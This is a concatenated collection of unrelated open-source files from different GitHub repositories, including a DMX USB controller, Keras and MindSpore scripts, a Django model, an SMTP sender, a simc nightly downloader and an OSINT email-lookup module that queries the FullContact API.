ihrigb/stagebuzzer
dbce1c5fa59a6f22e74d84ccc96d4d1a28a5b680
[ "Apache-2.0" ]
null
null
null
dmx/_open_dmx_usb.py
ihrigb/stagebuzzer
dbce1c5fa59a6f22e74d84ccc96d4d1a28a5b680
[ "Apache-2.0" ]
null
null
null
dmx/_open_dmx_usb.py
ihrigb/stagebuzzer
dbce1c5fa59a6f22e74d84ccc96d4d1a28a5b680
[ "Apache-2.0" ]
null
null
null
import pyftdi.ftdi as ftdi import threading import time vendor = 0x0403 product = 0x6001 class OpenDmxUsb(threading.Thread): def __init__(self): super().__init__() self.baud_rate = 250000 self.data_bits = 8 self.stop_bits = 2 self.parity = 'N' self.flow_ctrl = '' self.rts_state = 0 self.channel_values = [0] * 513 self._init_dmx() def _init_dmx(self): self.ftdi = ftdi.Ftdi() self.ftdi.open(vendor, product, 0) self.ftdi.set_baudrate(self.baud_rate) self.ftdi.set_line_property(self.data_bits, self.stop_bits, self.parity, break_=False) self.ftdi.set_flowctrl(self.flow_ctrl) self.ftdi.purge_rx_buffer() self.ftdi.purge_tx_buffer() self.ftdi.set_rts(self.rts_state) def _send_dmx(self): self.ftdi.write_data(self.channel_values) # Need to generate two bits for break self.ftdi.set_line_property(self.data_bits, self.stop_bits, self.parity, break_=True) self.ftdi.set_line_property(self.data_bits, self.stop_bits, self.parity, break_=True) self.ftdi.set_line_property(self.data_bits, self.stop_bits, self.parity, break_=False) def set_channel_values(self, channel_values): self.channel_values = channel_values def run(self) -> None: while True: self._send_dmx() time.sleep(0.1)
31.577778
94
0.65658
0c9417ad4274665b9aa73b50e73eb6c1a590c595
334
py
Python
musterloesungen/2.1/summe.py
giu/appe6-uzh-hs2018
204dea36be1e53594124b606cdfa044368e54726
[ "MIT" ]
null
null
null
musterloesungen/2.1/summe.py
giu/appe6-uzh-hs2018
204dea36be1e53594124b606cdfa044368e54726
[ "MIT" ]
null
null
null
musterloesungen/2.1/summe.py
giu/appe6-uzh-hs2018
204dea36be1e53594124b606cdfa044368e54726
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- # Kurs: Python: Grundlagen der Programmierung für Nicht-Informatiker # Semester: Herbstsemester 2018 # Homepage: http://accaputo.ch/kurs/python-uzh-hs-2018/ # Author: Giuseppe Accaputo # Aufgabe: 2.1 def summe(a,b,c): print(a + b + c) summe(1,2,3) summe(1,-1,0) summe(-1,-2,-3)
25.692308
76
0.622754
3306f16c49c2cdaedf84bb05719c3ac529a7ef39
329
py
Python
marsyas-vamp/marsyas/src/django/birdsong/application/birdsong/catalog/models.py
jaouahbi/VampPlugins
27c2248d1c717417fe4d448cdfb4cb882a8a336a
[ "Apache-2.0" ]
null
null
null
marsyas-vamp/marsyas/src/django/birdsong/application/birdsong/catalog/models.py
jaouahbi/VampPlugins
27c2248d1c717417fe4d448cdfb4cb882a8a336a
[ "Apache-2.0" ]
null
null
null
marsyas-vamp/marsyas/src/django/birdsong/application/birdsong/catalog/models.py
jaouahbi/VampPlugins
27c2248d1c717417fe4d448cdfb4cb882a8a336a
[ "Apache-2.0" ]
null
null
null
from django.db import models class Call(models.Model): name = models.CharField(max_length=200) matriline = models.CharField(max_length=200) notes = models.CharField(max_length=200) audio = models.CharField(max_length=200) image = models.CharField(max_length=200) duration = models.FloatField()
27.416667
48
0.717325
cc0b35c25b24c4a0e734c8f4bfed79081cf6f7e0
720
py
Python
Python/Topics/Sending-Email/06-html-attachment.py
shihab4t/Software-Development
0843881f2ba04d9fca34e44443b5f12f509f671e
[ "Unlicense" ]
null
null
null
Python/Topics/Sending-Email/06-html-attachment.py
shihab4t/Software-Development
0843881f2ba04d9fca34e44443b5f12f509f671e
[ "Unlicense" ]
null
null
null
Python/Topics/Sending-Email/06-html-attachment.py
shihab4t/Software-Development
0843881f2ba04d9fca34e44443b5f12f509f671e
[ "Unlicense" ]
null
null
null
import smtplib import os from email.message import EmailMessage EMAIL_ADDRESS = os.environ.get("GMAIL_ADDRESS") EMAIL_PASSWORD = os.environ.get("GMAIL_APP_PASS") with smtplib.SMTP_SSL("smtp.gmail.com", 465) as smtp: smtp.login(EMAIL_ADDRESS, EMAIL_PASSWORD) reciver = "[email protected]" msg = EmailMessage() msg["Subject"] = "Grab dinner this weekend? 2" msg["From"] = EMAIL_ADDRESS msg["To"] = reciver msg.set_content("This is plain text") msg.add_alternative("""\ <!DOCTYPE html> <html> <body> <h1 style="color:SlateGray;">This is an HTML Email!</h1> </body> </html> """, subtype="html") smtp.send_message(msg) print(f"Email was sented to {reciver}")
24
64
0.676389
c5798f983ff9c01735215a9490ff8227cd6dca70
2,781
py
Python
Chapter5_DNN/Chapter5_6_NeuralNetworkMath/gradientsAndGraph.py
thisisjako/UdemyTF
ee4102391ed6bd50f764955f732f5740425a9209
[ "MIT" ]
null
null
null
Chapter5_DNN/Chapter5_6_NeuralNetworkMath/gradientsAndGraph.py
thisisjako/UdemyTF
ee4102391ed6bd50f764955f732f5740425a9209
[ "MIT" ]
null
null
null
Chapter5_DNN/Chapter5_6_NeuralNetworkMath/gradientsAndGraph.py
thisisjako/UdemyTF
ee4102391ed6bd50f764955f732f5740425a9209
[ "MIT" ]
null
null
null
import os from typing import List from typing import Tuple import numpy as np import tensorflow as tf from tensorflow.keras.callbacks import TensorBoard from tensorflow.keras.layers import Activation from tensorflow.keras.layers import Dense from tensorflow.keras.losses import MeanSquaredError from tensorflow.keras.models import Sequential from tensorflow.keras.optimizers import Adam LOGS_DIR = os.path.abspath("C:/Users/Jan/Dropbox/_Programmieren/UdemyTF/logs/computation/") MODEL_LOG_DIR = os.path.join(LOGS_DIR, "gradient_model") def get_dataset() -> Tuple[np.ndarray, np.ndarray]: x = np.array( [[i, i] for i in range(100)], dtype=np.float32 ) y = np.array( [i for i in range(100)], dtype=np.float32 ).reshape(-1, 1) return x, y def build_model() -> Sequential: model = Sequential() model.add(Dense(1, input_shape=(2,), name="hidden")) model.add(Activation("relu", name="relu")) model.add(Dense(1, name="output")) model.summary() return model def get_gradients( x_test: np.ndarray, y_test: np.ndarray, model: Sequential, loss_object: tf.keras.losses.Loss ) -> List[Tuple[np.ndarray, np.ndarray]]: with tf.GradientTape() as tape: y_pred = model(x_test, training=True) loss_value = loss_object(y_test, y_pred) grads = tape.gradient(loss_value, model.trainable_variables) grad_var_tuples = [ (g, w) for (g, w) in zip(grads, model.trainable_variables) ] return grad_var_tuples if __name__ == "__main__": x, y = get_dataset() model = build_model() model.compile( loss="mse", optimizer=Adam(learning_rate=1e-2), metrics=["mse"] ) tb_callback = TensorBoard( log_dir=MODEL_LOG_DIR, embeddings_freq=0, write_graph=True ) model.fit( x=x, y=y, verbose=1, batch_size=1, epochs=0, callbacks=[tb_callback] ) model.layers[0].set_weights( [np.array([[-0.250], [1.000]]), np.array([0.100])] ) model.layers[2].set_weights( [np.array([[1.250]]), np.array([0.125])] ) ############### ### TESTING ### ############### loss_object = MeanSquaredError() x_test = np.array([[2, 2]]) y_test = np.array([[2]]) y_pred = model.predict(x_test) print(f"Pred: {y_pred}") layer_names = [ "hidden:kernel" "hidden:bias", "output:kernel", "output:bias" ] gradients = get_gradients(x_test, y_test, model, loss_object) for name, (grads, weight) in zip(layer_names, gradients): print(f"Name:\n{name}") print(f"Weights:\n{weight.numpy()}") print(f"Grads:\n{grads.numpy()}\n")
24.394737
91
0.613448
c59aa30ad222e8bde6175ed308b47d9288d6f8c9
484
pyde
Python
sketches/aquarium/aquarium.pyde
kantel/processingpy
74aae222e46f68d1c8f06307aaede3cdae65c8ec
[ "MIT" ]
4
2018-06-03T02:11:46.000Z
2021-08-18T19:55:15.000Z
sketches/aquarium/aquarium.pyde
kantel/processingpy
74aae222e46f68d1c8f06307aaede3cdae65c8ec
[ "MIT" ]
null
null
null
sketches/aquarium/aquarium.pyde
kantel/processingpy
74aae222e46f68d1c8f06307aaede3cdae65c8ec
[ "MIT" ]
3
2019-12-23T19:12:51.000Z
2021-04-30T14:00:31.000Z
from fish import Fish WIDTH = 640 HEIGHT = 416 NFISHES = 15 # Anzahl der Fische FPS = 60 fishes = [] def setup(): global bg size(WIDTH, HEIGHT) this.surface.setTitle(u"Jörgs kleines, bonbonbuntes Aquarium") bg = loadImage("background.png") for _ in range(NFISHES): fishes.append(Fish()) frameRate(FPS) def draw(): background(49, 197, 224) # Himmelblau image(bg, 0, 0) for fish in fishes: fish.show() fish.update()
18.615385
66
0.619835
c5e2383a33736e97cabae7f5d8ed6150518462ce
506
py
Python
source/pkgsrc/devel/gyp/patches/patch-gyptest.py
Scottx86-64/dotfiles-1
51004b1e2b032664cce6b553d2052757c286087d
[ "Unlicense" ]
1
2021-11-20T22:46:39.000Z
2021-11-20T22:46:39.000Z
source/pkgsrc/devel/gyp/patches/patch-gyptest.py
Scottx86-64/dotfiles-1
51004b1e2b032664cce6b553d2052757c286087d
[ "Unlicense" ]
null
null
null
source/pkgsrc/devel/gyp/patches/patch-gyptest.py
Scottx86-64/dotfiles-1
51004b1e2b032664cce6b553d2052757c286087d
[ "Unlicense" ]
null
null
null
$NetBSD: patch-gyptest.py,v 1.4 2014/08/21 14:49:43 he Exp $ * Add NetBSD 5, 6 and 7 target --- gyptest.py.orig 2014-07-14 14:19:50.000000000 +0000 +++ gyptest.py @@ -219,6 +219,10 @@ def main(argv=None): 'aix5': ['make'], 'freebsd7': ['make'], 'freebsd8': ['make'], + 'freebsd9': ['make'], + 'netbsd5': ['make'], + 'netbsd6': ['make'], + 'netbsd7': ['make'], 'openbsd5': ['make'], 'cygwin': ['msvs'], 'win32': ['msvs', 'ninja'],
28.111111
60
0.492095
76af98358bbb121804e0ab09430a0eac30ea0567
441
py
Python
python/image_processing/perspective_tr.py
SayanGhoshBDA/code-backup
8b6135facc0e598e9686b2e8eb2d69dd68198b80
[ "MIT" ]
16
2018-11-26T08:39:42.000Z
2019-05-08T10:09:52.000Z
python/image_processing/perspective_tr.py
SayanGhoshBDA/code-backup
8b6135facc0e598e9686b2e8eb2d69dd68198b80
[ "MIT" ]
8
2020-05-04T06:29:26.000Z
2022-02-12T05:33:16.000Z
python/image_processing/perspective_tr.py
SayanGhoshBDA/code-backup
8b6135facc0e598e9686b2e8eb2d69dd68198b80
[ "MIT" ]
5
2020-02-11T16:02:21.000Z
2021-02-05T07:48:30.000Z
import cv2 import numpy as np from matplotlib import pyplot as plt img = cv2.imread('city1.jpg') rows,cols,ch = img.shape pts1 = np.float32([[56,65],[368,52],[28,387],[389,390]]) pts2 = np.float32([[0,0],[300,0],[0,300],[300,300]]) M = cv2.getPerspectiveTransform(pts1,pts2) dst = cv2.warpPerspective(img,M,(300,300)) plt.subplot(121),plt.imshow(img),plt.title('Input') plt.subplot(122),plt.imshow(dst),plt.title('Output') plt.show()
22.05
56
0.69161
4ff3b6b59836604f755980cd03adae455ffef034
10,665
py
Python
ingrediens.py
ChristianKitte/Textextraktion-und-Einordnung-mit-Hilfe-neuronaler-Netze
53d3fc6b1c17f31146741cdebd743f4aa12a09e0
[ "MIT" ]
null
null
null
ingrediens.py
ChristianKitte/Textextraktion-und-Einordnung-mit-Hilfe-neuronaler-Netze
53d3fc6b1c17f31146741cdebd743f4aa12a09e0
[ "MIT" ]
16
2020-01-28T23:04:13.000Z
2022-03-12T00:02:40.000Z
ingrediens.py
ChristianKitte/Textextraktion-und-Einordnung-mit-Hilfe-neuronaler-Netze
53d3fc6b1c17f31146741cdebd743f4aa12a09e0
[ "MIT" ]
null
null
null
import json import pandas as pd class Ingredients(): """The Ingrediens class contains a list of ingredients and provides access to them. It provides functionality to search the list of substances using a search term. If it is generated manually, a list of ingredients can be transferred to it. A JSON file is then not necessary. If it is created using the instance method, it is based on the JSON file defined in json_path. The static convert method can be used to convert an Excel file corresponding to the requirements into a JSON file. Requirements are: Sheet 1, start at A1 (header): ID, E-Nr, ingrediens (comma separated), remark, annotation, classification, keywords (comma separated) An ingredient represents a list with the properties specified here: ingredient_new = [id, e_number, ingrediens_list, remark, annotation, classification, keywords_list]""" def __init__(self, items=[], usePatch=True): """The constructor. A list of ingredients can be passed as an optional argument. ingredient_new = [id, e_number, ingrediens_list, remark, annotation, classification, keywords_list]. :param items:An optional list of items to add. :param usePatch:If true, special characters contained in search words are converted to normal letters (e.g. ö -> o) """ try: self.usePatch = usePatch self.items = items self.search_items = {} except: print('Error in method {0} in module {1}'.format('init', 'ingrediens.py')) @staticmethod def instance(json_path, usePatch=True): """Returns a new instance of the Ingrediens class based on the JSON file named in json_path. :param json_path:The path to the Json file that serves as the database. :param usePatch:If true, special characters contained in search words are converted to normal letters (e.g. ö -> o). :return:An instance of the class Ingridiens. """ try: with open(json_path, mode='r', encoding='utf-8') as json_file: json_data = json.load(json_file) ingrediens = Ingredients(json_data['items'], usePatch) ingrediens.update() return ingrediens except: print('Error in method {0} in module {1}'.format('instance', 'ingrediens.py')) return None @staticmethod def convert(excel_path, json_path): """A static method which converts an Excel file specified in excel_path to the JSON file defined by json_path. :param excel_path:The excel path. :param json_path:The json path. """ try: raw = pd.read_excel(excel_path) ingrediens_data = Ingredients() for x in raw.values: id = x[0] e_number = str(x[1]).strip() ingrediens = str(x[2]).split(',') ingrediens_list = [x.strip() for x in ingrediens] remark = str(x[3]) annotation = str(x[4]) classification = str(x[5]) keywords = str(x[6]).split(',') keywords_list = [x.strip() for x in keywords] ingredient_new = [id, e_number, ingrediens_list, remark, annotation, classification, keywords_list] ingrediens_data.add(ingredient_new) ingrediens_data.update() with open(json_path, mode='w', encoding='utf-8') as json_file: json.dump(ingrediens_data.__dict__, json_file, ensure_ascii=False) except: print('Error in method {0} in module {1}'.format('convert', 'ingrediens.py')) def __iter__(self): """Returns an iterator for the list of ingredients. :return:An iterator. """ try: return self except: print('Error in method {0} in module {1}'.format('iter', 'ingrediens.py')) return None def next(self): """Goes through the list of ingredients (Generator). :return:The next Item """ try: for item in self.items: yield item except: print('Error in method {0} in module {1}'.format('next', 'ingrediens.py')) return None def add(self, item): """Adds a new ingredient to the list of ingredients. ingredient_new = [id, e_number, ingrediens_list, remark, annotation, classification, keywords_list]. :param item:The element to be added. """ try: self.items.append(item) except: print('Error in method {0} in module {1}'.format('add', 'ingrediens.py')) def contains(self, item): """Returns True and the ID of an ingredient if the transfer item could be assigned to a substance. Otherwise, False and -1 are returned. During preprocessing, the search string is converted to lowercase letters and all spaces are removed. :param item:The element (searchstring) for which a check is to be made. :return:True and the ID if exists, otherwise False. """ try: item = item.lower() item = str(item).replace(' ', '') if self.usePatch == True: item = self.replaceChar(item) if item in self.search_items: id = self.search_items[item] return True, id else: return False, -1 except: print('Error in method {0} in module {1}'.format('contains', 'ingrediens.py')) return None def replaceChar(self, item): """Replaces the special characters ü, ö, ä with u, o, a :param item:The element (searchstring) for which a check is to be made. :return:The item with the replacements """ try: str(item).replace("ö", "o") str(item).replace("ä", "a") str(item).replace("ü", "u") return item except: print('Error in method {0} in module {1}'.format('replaceChar', 'ingrediens.py')) return None def replaceChar_in_String(self, item): """Searches the passed word for the letters ä, ö, ü. :param item:The word to analyze :return:True, if one of the umlauts was found """ try: search_list = ["ä", "ö", "ü"] for x in search_list: if item.find(x): return True return False except: print('Error in method {0} in module {1}'.format('replaceChar_in_String', 'ingrediens.py')) return None def get_item(self, id): """Returns an ingredient based on the ID of the substance. ingredient_new = [id, e_number, ingrediens_list, remark, annotation, classification, keywords_list]. :param id:The ID for which an element is to be returned. :return:The associated element. """ try: x = [x for x in self.items if x[0] == id] return x except: print('Error in method {0} in module {1}'.format('get_item', 'ingrediens.py')) return None def get_enumber(self, id): """Returns the name of an ingredient based on the ID of the substance. :param id:The Id for which an E-number is to be returned. :return:The corresponding E-number. """ try: return self.get_item(id)[0][1] except: print('Error in method {0} in module {1}'.format('get_enumber', 'ingrediens.py')) return None def get_name(self, id): """Returns the name of an ingredient based on the ID of the substance. :param id:The ID for which a name is to be returned. :return:The corresponding name. """ try: return self.get_item(id)[0][2] except: print('Error in method {0} in module {1}'.format('get_name', 'ingrediens.py')) return None def get_remark(self, id): """Returns the remark assigned to an ingredient based on the ID of the substance. :param id:The ID for which a comment is to be returned. :return:The corresponding remark. """ try: return self.get_item(id)[0][3] except: print('Error in method {0} in module {1}'.format('get_remark', 'ingrediens.py')) return None def update(self): """Builds a dictionary based on the existing data. The search terms represent the key values, while the value represents the ID of the ingredient. The list consists of a variation of the E-number (E 123 ==> e123, e-123), the substance names and the extended keyword list. If the ingredient or keyword contains an umlaut, a second version with the underlying letter is added (a instead of ä etc.). Preprocessing converts the matching strings to lowercase letters and removes all blanks during the search. """ try: x = [x for x in self.items] for x in self.items: # E-numbers can have attached letters. These must be retained. e_number = str(x[1]).lower().strip() e_number = e_number[0].replace('e', '') + e_number[1:] e_number = e_number.strip() self.search_items.update({'e' + e_number: x[0]}) self.search_items.update({'e-' + e_number: x[0]}) for y in x[2]: insert_string = str(y).strip().lower().replace(' ', '') self.search_items.update({insert_string: x[0]}) if self.replaceChar_in_String(insert_string) == True: self.search_items.update({self.replaceChar(insert_string): x[0]}) for y in x[6]: insert_srting = str(y).strip().lower().replace(' ', '') self.search_items.update({insert_srting: x[0]}) if self.replaceChar_in_String(insert_string) == True: self.search_items.update({self.replaceChar(insert_string): x[0]}) except: print('Error in method {0} in module {1}'.format('update', 'ingrediens.py'))
39.065934
119
0.568776
8b03c4ca86da0b9cb69890510188b9bcc8bd9dc3
3,161
py
Python
shinrl/envs/mountaincar/plot.py
omron-sinicx/ShinRL
09f4ae274a33d1fc1d9d542f816aef40014af6b5
[ "MIT" ]
34
2021-12-09T07:12:57.000Z
2022-03-11T08:17:20.000Z
shinrl/envs/mountaincar/plot.py
omron-sinicx/ShinRL
09f4ae274a33d1fc1d9d542f816aef40014af6b5
[ "MIT" ]
null
null
null
shinrl/envs/mountaincar/plot.py
omron-sinicx/ShinRL
09f4ae274a33d1fc1d9d542f816aef40014af6b5
[ "MIT" ]
4
2021-12-11T07:48:01.000Z
2022-03-01T23:50:33.000Z
import functools from typing import Any, Optional import matplotlib.pyplot as plt import numpy as np import pandas as pd import seaborn as sns from chex import Array from matplotlib.axes import Axes from .calc import * from .config import MountainCarConfig @jax.jit def disc_pos_vel( config: MountainCarConfig, pos: float, vel: float ) -> Tuple[float, float]: pos_step = (config.pos_max - config.pos_min) / (config.pos_res - 1) vel_step = (config.vel_max - config.vel_min) / (config.pos_res - 1) pos_idx = jnp.floor((pos - config.pos_min) / pos_step + 1e-5).astype(jnp.uint32) pos_idx = jnp.clip(pos_idx, 0, config.pos_res - 1) vel_idx = jnp.floor((vel - config.vel_min) / vel_step + 1e-5).astype(jnp.uint32) vel_idx = jnp.clip(vel_idx, 0, config.vel_res - 1) return pos_idx, vel_idx @functools.partial(jax.vmap, in_axes=(None, 1, 1), out_axes=0) def undisc_pos_vel( config: MountainCarConfig, pos_round: float, pos_vel: float ) -> Tuple[float, float]: pos_step = (config.pos_max - config.pos_min) / (config.pos_res - 1) vel_step = (config.vel_max - config.vel_min) / (config.pos_res - 1) pos = pos_round * pos_step + config.pos_min pos = jnp.clip(pos, config.pos_min, config.pos_max) vel = pos_vel * vel_step + config.vel_min vel = jnp.clip(vel, config.vel_min, config.vel_max) return pos, vel @functools.partial(jax.vmap, in_axes=(None, 1), out_axes=0) def disc(config, s): pos, vel = state_to_pos_vel(config, s) pos, vel = disc_pos_vel(config, pos, vel) return pos, vel def plot_S( tb: Array, config: MountainCarConfig, title: Optional[str] = None, ax: Optional[Axes] = None, cbar_ax: Optional[Axes] = None, vmin: Optional[float] = None, vmax: Optional[float] = None, fontsize: Optional[int] = 10, **kwargs: Any, ) -> None: assert len(tb.shape) == 1 reshaped_values = np.empty((config.pos_res, config.vel_res)) reshaped_values[:] = np.nan ss = jnp.arange(tb.shape[0])[:, None] pos, vel = disc(config, ss) reshaped_values[pos, vel] = tb if ax is None: grid_kws = {"width_ratios": (0.95, 0.05)} fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(8, 6), gridspec_kw=grid_kws) ax, cbar_ax = axes[0], axes[1] vmin = tb.min() if vmin is None else vmin vmax = tb.max() if vmax is None else vmax pos_ticks, vel_ticks = [], [] ii = jnp.arange(config.pos_res)[:, None] pos_ticks, vel_ticks = undisc_pos_vel(config, ii, ii) pos_ticks = pos_ticks.reshape(-1).tolist() pos_ticks = [round(pos, 3) for pos in pos_ticks] vel_ticks = vel_ticks.reshape(-1).tolist() vel_ticks = [round(vel, 3) for vel in vel_ticks] data = pd.DataFrame(reshaped_values, index=pos_ticks, columns=vel_ticks).T data = data.ffill(axis=0) data = data.ffill(axis=1) sns.heatmap( data, ax=ax, cbar=cbar_ax is not None, cbar_ax=cbar_ax, vmin=vmin, vmax=vmax, **kwargs, ) ax.set_title(title, fontsize=fontsize) ax.set_xlabel("Position", fontsize=fontsize) ax.set_ylabel("Velocity", fontsize=fontsize)
32.927083
88
0.660234
50655ba275e3ff99311dff03da229bfb4792bf29
4,357
py
Python
official/gnn/bgcf/preprocess.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
77
2021-10-15T08:32:37.000Z
2022-03-30T13:09:11.000Z
official/gnn/bgcf/preprocess.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
3
2021-10-30T14:44:57.000Z
2022-02-14T06:57:57.000Z
official/gnn/bgcf/preprocess.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
24
2021-10-15T08:32:45.000Z
2022-03-24T18:45:20.000Z
# Copyright 2021 Huawei Technologies Co., Ltd # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================ """ preprocess. """ import os import argparse import numpy as np from mindspore import Tensor from mindspore.common import dtype as mstype from src.utils import convert_item_id from src.dataset import TestGraphDataset, load_graph parser = argparse.ArgumentParser() parser.add_argument("--dataset", type=str, default="Beauty", help="choose which dataset") parser.add_argument("--datapath", type=str, default="./scripts/data_mr", help="minddata path") parser.add_argument("--num_neg", type=int, default=10, help="negative sampling rate ") parser.add_argument("--raw_neighs", type=int, default=40, help="num of sampling neighbors in raw graph") parser.add_argument("--gnew_neighs", type=int, default=20, help="num of sampling neighbors in sample graph") parser.add_argument("--result_path", type=str, default="./preprocess_Result/", help="result path") args = parser.parse_args() def get_bin(): """generate bin files.""" train_graph, _, sampled_graph_list = load_graph(args.datapath) test_graph_dataset = TestGraphDataset(train_graph, sampled_graph_list, num_samples=args.raw_neighs, num_bgcn_neigh=args.gnew_neighs, num_neg=args.num_neg) num_user = train_graph.graph_info()["node_num"][0] num_item = train_graph.graph_info()["node_num"][1] for i in range(50): data_path = os.path.join(args.result_path, "data_" + str(i)) users_path = os.path.join(data_path, "00_users") os.makedirs(users_path) items_path = os.path.join(data_path, "01_items") os.makedirs(items_path) neg_items_path = os.path.join(data_path, "02_neg_items") os.makedirs(neg_items_path) u_test_neighs_path = os.path.join(data_path, "03_u_test_neighs") os.makedirs(u_test_neighs_path) u_test_gnew_neighs_path = os.path.join(data_path, "04_u_test_gnew_neighs") os.makedirs(u_test_gnew_neighs_path) i_test_neighs_path = os.path.join(data_path, "05_i_test_neighs") os.makedirs(i_test_neighs_path) i_test_gnew_neighs_path = os.path.join(data_path, "06_i_test_gnew_neighs") os.makedirs(i_test_gnew_neighs_path) test_graph_dataset.random_select_sampled_graph() u_test_neighs, u_test_gnew_neighs = test_graph_dataset.get_user_sapmled_neighbor() i_test_neighs, i_test_gnew_neighs = test_graph_dataset.get_item_sampled_neighbor() u_test_neighs = Tensor(convert_item_id(u_test_neighs, num_user), mstype.int32) u_test_gnew_neighs = Tensor(convert_item_id(u_test_gnew_neighs, num_user), mstype.int32) i_test_neighs = Tensor(i_test_neighs, mstype.int32) i_test_gnew_neighs = Tensor(i_test_gnew_neighs, mstype.int32) users = Tensor(np.arange(num_user).reshape(-1,), mstype.int32) items = Tensor(np.arange(num_item).reshape(-1,), mstype.int32) neg_items = Tensor(np.arange(num_item).reshape(-1, 1), mstype.int32) file_name = 'amazon-beauty.bin' users.asnumpy().tofile(os.path.join(users_path, file_name)) items.asnumpy().tofile(os.path.join(items_path, file_name)) neg_items.asnumpy().tofile(os.path.join(neg_items_path, file_name)) u_test_neighs.asnumpy().tofile(os.path.join(u_test_neighs_path, file_name)) u_test_gnew_neighs.asnumpy().tofile(os.path.join(u_test_gnew_neighs_path, file_name)) i_test_neighs.asnumpy().tofile(os.path.join(i_test_neighs_path, file_name)) i_test_gnew_neighs.asnumpy().tofile(os.path.join(i_test_gnew_neighs_path, file_name)) print("=" * 20, "export bin files finished.", "=" * 20) if __name__ == "__main__": get_bin()
47.879121
108
0.708286
ba1237c81e0c4241ddb6bd5686ed9d889e12f4ee
3,951
py
Python
internal/auto_download.py
Saeldur/sl-shadow-priest
a7b027506e52db8e7786ed9d67971adbba7389bd
[ "MIT" ]
null
null
null
internal/auto_download.py
Saeldur/sl-shadow-priest
a7b027506e52db8e7786ed9d67971adbba7389bd
[ "MIT" ]
null
null
null
internal/auto_download.py
Saeldur/sl-shadow-priest
a7b027506e52db8e7786ed9d67971adbba7389bd
[ "MIT" ]
null
null
null
"""downloads the nightly simc""" #!/usr/bin/env python import glob import os import re import subprocess import time from urllib.error import URLError from urllib.request import urlopen, urlretrieve def download_latest(): """main download function""" seven_zip_paths = ["7z.exe", "C:/Program Files/7-Zip/7z.exe"] seven_zip_executable = _find_7zip(seven_zip_paths) print("Starting auto download check of SimulationCraft.") # Application root path, and destination path rootpath = os.path.dirname(os.path.realpath(__file__)) download_dir = os.path.join(rootpath, "..", "auto_download") if not os.path.exists(download_dir): os.makedirs(download_dir) base_path = "http://downloads.simulationcraft.org/nightly" # Get filename of latest build of simc try: html = urlopen(f"{base_path}/?C=M;O=D").read().decode("utf-8") except URLError: print("Could not access download directory on simulationcraft.org") # filename = re.search(r'<a href="(simc.+win64.+7z)">', html).group(1) filename = list( filter(None, re.findall(r'.+nonetwork.+|<a href="(simc.+win64.+7z)">', html)) )[0] print(f"Latest simc: {filename}") # Download latest build of simc filepath = os.path.join(download_dir, filename) if not os.path.exists(filepath): url = f"{base_path}/{filename}" print(f"Retrieving simc from url '{url}' to '{filepath}'.") urlretrieve(url, filepath) else: print(f"Latest simc version already downloaded at {filename}.") return filepath.strip(".7z") # Unpack downloaded build and set simc_path dir_name = filename[: filename.find(".7z")] simc_path = os.path.join(download_dir, dir_name, "simc.exe") if not os.path.exists(simc_path): # pylint: disable=broad-except try: cmd = f'{seven_zip_executable} x "{filepath}" -aoa -o"{download_dir}"' print(f"Running unpack command '{cmd}'") subprocess.call(cmd) time.sleep(1) # Nightly builds include their commit hash, we need to strip that out. commit = dir_name.rsplit("-")[-1] _rename_directory(f"{download_dir}/simc-*-win64/", commit) except Exception as error: print(f"Exception when unpacking: {error}") # keep the latest 7z to remember current version, but clean up any other ones _cleanup_older_files(download_dir, dir_name) else: print(f"Simc already exists at '{repr(simc_path)}'.") return os.path.join(download_dir, dir_name) def _find_7zip(search_paths): """Try to find 7zip, and raise an error if not""" # pylint: disable=bare-except, unreachable for executable in search_paths: try: if not os.path.exists(executable): print(f"7Zip executable at '{executable}' does not exist.") continue return executable break except: continue else: raise RuntimeError( "Could not unpack the auto downloaded SimulationCraft executable." f"Install 7Zip at one of the following locations: {search_paths}." ) def _cleanup_older_files(download_dir, current_dir): # pylint: disable=bare-except try: files = glob.glob(f"{download_dir}/simc*") for file in files: if ( os.path.basename(file) != current_dir and os.path.basename(file) != f"{current_dir}.7z" ): print(f"Removing old simc from '{os.path.basename(file)}'.") os.remove(file) except: print("Unable to automatically remove files, cleanup old files in auto_download/") def _rename_directory(glob_path, commit): for folder in glob.glob(glob_path): print(f"renaming {folder} -> {folder}-{commit}") os.rename(folder, f"{folder[:-1]}-{commit}")
34.657895
90
0.630979
ad85fe9834a7307717abfda7761f72db44b57b62
1,876
py
Python
OSINT-SPY-master/modules/email_search.py
Zusyaku/Termux-And-Lali-Linux-V2
b1a1b0841d22d4bf2cc7932b72716d55f070871e
[ "Apache-2.0" ]
2
2021-11-17T03:35:03.000Z
2021-12-08T06:00:31.000Z
OSINT-SPY-master/modules/email_search.py
Zusyaku/Termux-And-Lali-Linux-V2
b1a1b0841d22d4bf2cc7932b72716d55f070871e
[ "Apache-2.0" ]
null
null
null
OSINT-SPY-master/modules/email_search.py
Zusyaku/Termux-And-Lali-Linux-V2
b1a1b0841d22d4bf2cc7932b72716d55f070871e
[ "Apache-2.0" ]
2
2021-11-05T18:07:48.000Z
2022-02-24T21:25:07.000Z
from .config import * import requests import json def fetch_email(email_id, json_output=False): url = 'https://api.fullcontact.com/v3/person.enrich' headers = {"Authorization": f"Bearer {fullcontact_api_key}"} data = json.dumps({"email": email_id}) response = requests.post(url, data=data, headers=headers) if json_output: print(response.json()) return if response.status_code == 401: print('Wrong fullcontact_api_key.') return if response.status_code == 403: print('Invalid authentication. Check API key') return if response.status_code == 404: print('Profile not found.') return print('General Details:') print(('-' * 20)) attributes = ['fullName', 'ageRange', 'gender', 'location', 'title', 'organization', 'twitter', 'linkedin', 'facebook', 'bio', 'avatar', 'website'] response = response.json() for attribute in attributes: try: value = response[attribute] if value is not None: print(f'{attribute.capitalize()}:: {value}') except KeyError: pass print('\nMore details:') print(('-' * 20)) details = ['emails', 'phones', 'employment', 'education', 'interests'] for attribute in details: try: value_list = response['details'][attribute] if value_list: 